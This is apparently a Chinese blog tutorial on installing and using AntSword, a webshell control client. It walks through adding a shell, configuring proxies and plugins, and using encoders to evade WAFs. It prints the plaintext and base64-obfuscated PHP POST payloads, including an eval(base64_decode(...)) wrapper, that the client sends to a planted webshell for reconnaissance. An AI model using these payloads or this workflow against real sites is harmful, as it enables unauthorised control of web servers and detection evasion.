中国蚁剑下载、安装、使⽤教程
⽂章⽬录
中国蚁剑下载、安装、使⽤教程
中国蚁剑是⼀款开源的跨平台⽹站管理⼯具,它主要⾯向于合法授权的渗透测试安全⼈员以及进⾏常规操作的⽹站管理员。
通俗的讲:中国蚁剑是 ⼀ 款⽐菜⼑还⽜的shell控制端软件。
中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致⼒于为不同层次的⼈提供最简单易懂、⽅便直接的代码展⽰及其修改说明,努⼒让⼤家可以⼀起为这个项⽬贡献出⼒所能及的点点滴滴,让这款⼯具真正能让⼤家⽤得顺⼼、舒适,让它能为⼤家施展出最⼈性化最适合你的能⼒!
⼀、中国蚁剑下载
注意:我们下载的时候需要下载两个部分,⼀个是项⽬核⼼源码”antSword“,另⼀个是加载器;加载器则分为三个版本:Mac、
Windows、Linux。
⼆、中国蚁剑安装
由于我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我就以Windows版本64位来⽰例了。
1、我们解压“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击“”;
第⼀次安装项⽬需要先初始化,如果你已经下载了核⼼源码,就选择项⽬源码的⽂件夹。(如果只下载了加载器,选择⼀个空⽂件夹,加载器会⾃动帮你下载核⼼项⽬源码)。
注意:这个项⽬⽂件夹就是你以后需要备份的,存储着你的shell和shell内的资料。
2、等初始化完成后,再双击“”即可正常启动!
三、中国蚁剑使⽤
使⽤其实跟菜⼑⼏乎差不多,只是蚁剑功能更强⼤⼀些,下⾯就简单给⼤家说说:1、添加⼀个shell
⾸先:右键单击 - 添加数据;
其次:输⼊URL地址,连接密码以及编码设置。PHP语⾔推荐编辑器使⽤chr加密;
再次:如果需要⾃⼰写编码器的加密类型,可以按下图来操作:
从次:还可以配置shell的请求信息和post内容;
下载安装最后:还可以配置全局代理;
2、插件
中国蚁剑有⼀个插件市场,可以安装⼀些插件,插件有很多。以下是部份插件截图:
3、关于编码器
编码器是这个程序的过⼈之处,⽤编码器加密可以轻松绕过WAF。
不妨,我们来对⽐⼀下默认不使⽤编码传输和base64编码传输的区别:
明⽂传输,post内容为:
ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["P ATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_ex ists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8 e51f";die();
base64加密传输,post内容为:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9T RVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWY oc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30 kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbI m5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@ba se64_decode($_POST[_0x4ee8506e59871]));

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。